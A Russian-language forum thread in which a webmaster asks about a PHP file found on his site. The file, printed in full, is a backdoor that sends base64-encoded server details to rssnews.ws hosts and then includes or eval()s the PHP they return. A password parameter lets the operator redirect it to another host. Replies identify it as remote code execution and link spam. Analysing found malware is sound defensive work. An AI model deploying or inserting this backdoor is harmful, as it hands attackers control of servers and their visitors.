Что он делает?

[Denis5]

Нашёл на одном гсе в папке ксапа.

<? error_reporting(0);

$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
$f=base64_decode("cnNzbmV3cy53cw==");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="4434c89f7bbc81b7ce9623ae15229e46") $f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
$o=curl_exec($cu);
curl_close($cu);
eval($o);};
die(); 
?>

 

[PapaJoe]

скрипт либо инклюдит какой-то файл с Для просмотра ссылки Войди или Зарегистрируйся либо качает его и выполняет на серваке(т.е. там должен быть php-скрипт, т.к. выполнение происходит через ф-цию eval() )
где DATA - это данные хоста

$_SERVER["HTTP_HOST"]
$_SERVER["SERVER_NAME"]
$_SERVER["REQUEST_URI"]
$_SERVER["PHP_SELF"]
$_SERVER["QUERY_STRING"]
$_SERVER["HTTP_REFERER"]
$_SERVER["HTTP_USER_AGENT"]
$_SERVER["REMOTE_ADDR"]
$_SERVER["SCRIPT_FILENAME"]
$_SERVER["HTTP_ACCEPT_LANGUAGE"]

(закодированные в base64)
на котором находится приведенный вами скрипт

 

[t0os]

Похоже на расставление линков для дора. Или сам дор, не расшифровывал.

 

[Denis5]

ааа.. то есть получается к xapповским ссылкам подсовывает ещё и свои...
не плохо придумали!!!

а можно ли зная имя этой папки в которой текстовые файлы со ссылками ксапа залить туда этот php файл или он туда попал через какую-то другую дыру?


Кстати чудесным образом после удаления этого файла лёг сервер. В саппорте стандартная отписка, мол техническа профилактика.

Хорошо что это шеред и мне пофигу на него

 

[t0os]

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

 

[-c0d3r-]

Попытка проинклудить опр страницу в зависимости от некоторых параметров.

 

[lesorub]

Вот что пишет этот сервер 71.rssnews.ws

What is this site?
This site helps webmasters to earn money with their sites.
How it works?
Our program generate traffic from search engines and display advertising.
What shell I do to start with you ?
Signup, get php file from member area, put file into your website directory, modify or create .htaccess in the same directory, and receive money !

Регистрация по инвайтам

В нете полно ссылок на этот бэкдор